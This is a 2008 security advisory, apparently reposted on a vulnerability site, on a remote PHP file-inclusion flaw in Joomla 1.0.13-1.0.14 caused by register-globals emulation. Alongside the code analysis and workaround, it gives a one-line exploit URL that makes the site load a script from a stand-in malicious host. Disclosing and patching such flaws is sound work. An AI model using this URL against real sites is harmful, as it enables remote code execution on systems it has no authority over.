Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php

2008-12-21 / 2008-12-22
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Affects: Joomla 1.0.13 - 1.0.14 Vulnerability: (remote) PHP file inclusion possible if old configuration.php Date: 14-feb-2008 Introduction: Remote PHP file inclusion is possible when RG_EMULATION is not defined in configuration.php. This is typical when upgrading from an older version, leaving configuration.php untouched. Furthermore, in PHP, register_globals must be 'off', for this exploit to work. In Joomla >=1.0.13, configuration.php-dist disables register_globals emulation, by defining RG_EMULATION false. In older Joomla versions, this was defined in globals.php instead. Users upgrading, without touching configuration.php (quite typical), will have RG_EMULATION unset, resulting in the following vulnerability. In Revision 7424 of globals.php, the 'configuration.php' file is included before registerGlobals() is called, allowing a malicious peer to override any value set in configuration.php. Details: Since revision 7424, globals.php includes 'configuration.php' if RG_EMULATION is unset, and enables RG_EMULATION by default for 'old configuration files': if( defined( 'RG_EMULATION' ) === false ) { if( file_exists( dirname(__FILE__).'/configuration.php' ) ) { require( dirname(__FILE__).'/configuration.php' ); } if( defined( 'RG_EMULATION' ) === false ) { // The configuration file is old so default to on define( 'RG_EMULATION', 1 ); } } The registerGlobals function is called *after* having included 'configuration.php': } else if (ini_get('register_globals') == 0) { // php.ini has register_globals = off and emulate = on registerGlobals(); Maliciously set GET variables cause variables set by configuration.php to be overwritten. Looking in index.php: require( 'globals.php' ); require_once( 'configuration.php' ); Since 'configuration.php' was already included by globals.php, the require_once() won't include the configuration.php again (leaving "attacker's" values untouched!). The exploit: http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s cript.txt Workaround: In index*.php and administrator/index*.php change: require_once( 'configuration.php' ); to require('configuration.php'); Or disable RG_EMULATION by using the line in configuration.php-dist in configuration.php: if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by default for security Regards, Hendrik-Jan Verheij BWSS B.V.

References:

http://www.joomla.org/announcements/release-news/4609-joomla-1015-released.html
http://www.securityfocus.com/bid/27795
http://www.securityfocus.com/archive/1/archive/1/488199/100/200/threaded
http://www.securityfocus.com/archive/1/archive/1/488126/100/200/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top